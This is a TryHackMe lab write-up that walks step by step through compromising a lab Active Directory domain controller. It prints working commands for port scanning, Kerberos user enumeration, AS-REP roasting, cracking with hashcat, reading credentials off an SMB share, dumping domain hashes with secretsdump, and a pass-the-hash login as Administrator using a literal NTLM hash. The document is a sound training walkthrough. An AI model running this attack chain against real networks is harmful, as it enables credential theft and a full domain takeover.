Exploiting Active Directory — (TryHackMe) THM Attacktive Directory Lab

ENUMERATION

We first start by running a masscan on all ports (65535).

sudo masscan -p1-65535 10.10.245.16 --rate=1000 -e tun0 > THM_attacktive_directory

-p = specifies the port

— rate = specifies the speed

e = specifies the network interface

We used the cat command to view the file.

We wrote a customized bash script to automate the scanning process

1. In icon (1), we’re storing the output of the command in a variable THM_attacktive_directory
2. In icon (2) we’re referencing the file THM_attacktive_directory we used to store the output of the masscan.
3. We’ll use the command-line utility tool (awk) for pattern matching at icons (3) and (4) in the image below. Awk gives us the capability to use conditional statements to manipulate and process text. In icon (3), we used awk -F “ “ ‘{print $4}’ to filter the output of our masscan that was stored in THM_attacktive_directory as a text file. After running the command in icon (3), our output will be similar to;

49665/tcp

49679/tcp

53/tcp

Etc…

Note: -F command stands for field separator and was used to strip off white space and leave only the 4th index.

4. In icon (4), the -F command was used to strip off the / and leave only the first index. The new output will look like this;

49665

49679

53

5. The tr (icon 5) command line utility was used to replace the new line character (\n) with a comma (,). The new output will look like this; 49665, 49679, 53 etc…

THM_attacktive_directory=$(cat THM_attacktive_directory | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | tr '\n' ',')

We used the cat command to view the content of the variable.

Using Nmap, we ran a Nmap Scripting Engine to enumerate for vulnerabilities on the ports stored in the THM_attacktive_directory variable.

sudo nmap -Pn -sV -sC -p$THM_attacktive_directory 10.10.245.16

Looking at the output of the Nmap scan, we can see that a lot of ports are opened. But, it is worthy of note that ports 80 (HTTP), 88 (Kerberos-sec), 389 (LDAP — filtered), 3268 (LDAP), 139 (SMB) and 445 (SMB) are opened. This is an indication of an Active Directory. Note: the NetBios_Domain_Name (THM_AD) and the DNS_Domain_Name (spookysec.local).

We used kerbrute, a popular enumeration tool used to abuse Kerberos pre-authentication on port 88 by brute-forcing valid active-directory users. We’ll first start by running the help command.

./kerbrute -h      

./kerbrute userenum --dc 10.10.245.16 -d spookysec.local userlist.txt 

Using the kerbrute tool and the userlist.txt provided by the author of the room to enumerate we have a list of valid usernames. Note: The userlist.txt should be in the same folder as the kerbrute executable.

EXPLOITATION

Now we have valid user accounts, we performed the ASREPRoasting attack. This type of attack searches for user accounts that have the privilege “Does not require Pre-Authentication” (DON’T_REQ_PREAUTH) activated. We’ll be using a tool from the impacket package called GetNPUsers.py. This tool will allow us to perform search queries for user accounts with DON’T_REQ_PREAUTH activated.

We’ll start by looking at the help command;

python3.9 /opt/impacket/examples/GetNPUsers.py -h 

We then run the command below for the notable user accounts (svc-admin and backup) identified earlier and store the output in a text file svc-admin.

python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.245.16 spookysec.local/svc-admin -no-pass | sudo tee svc-admin 

Note: backup@spookysec.local does not have the DON’T_REQ_PREAUTH set.

python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.245.16 spookysec.local/backup -no-pass | sudo tee sbackup

We’ll then search the web for hashcat mode to crack a kerberos hash.

Some basic insight in attacking Active Directory

After identifying the mode, we’ll go ahead to crack the hash using hashcat tool and the command below.

sudo hashcat -m 18200 -a 0 svc-admin /usr/share/wordlists/rockyou.txt --force

After getting a valid password and user account, we try to access the victim machine share folder remotely using smbclient (remember smb port was opened during our Nmap scan). Let us run the command;

smbclient -L 10.10.245.16 -U 'svc-admin'

Note: -L is used to list the remote shares the server is listing

We’ll then try to access the remote share “backup” using the command below.

smbclient \\\\10.10.245.16\\backup -U 'svc-admin'

Note: \\\\ is used as an escape character.

Looking at the files inside the backup remote shares, we can see backup_credentials.txt

Using more to view the content, we can see that its content is encoded in base64.

Using our base64 command line utility, we were able to decode its content and the content appears to be a password for the backup account.

echo "put_base64_strings_inside_here" | base64 -d

PRIVILEGE ESCALATION

Using secretsdump.py (another tool from impacket) we’ll attempt to dump hashes. This is the usage of secretdump.py — secretsdump.py -just-dc- <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

sudo secretsdump.py -just-dc backup@10.10.245.16 

Now we have the hashes, we’ll apply a technique called to pass the hash to fully gain access to the victim’s machine. This is a technique where an attacker will try to gain access to a victim’s machine without the victim’s password but rather attempt to bypass authentication using the victim’s NTLM hash.

To perform this attack (PTH), we’ll use a tool called evil-winrm. The command below shows how you can use the tool.

└─$ evil-winrm -i 10.10.245.16 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Where -i = domain IP

-u = domain user

• H = domain user NTLM hash.

From the image below you can see we were able to gain access to the administrator account remotely and was able to navigate the victim’s system to retrieve all the flags required.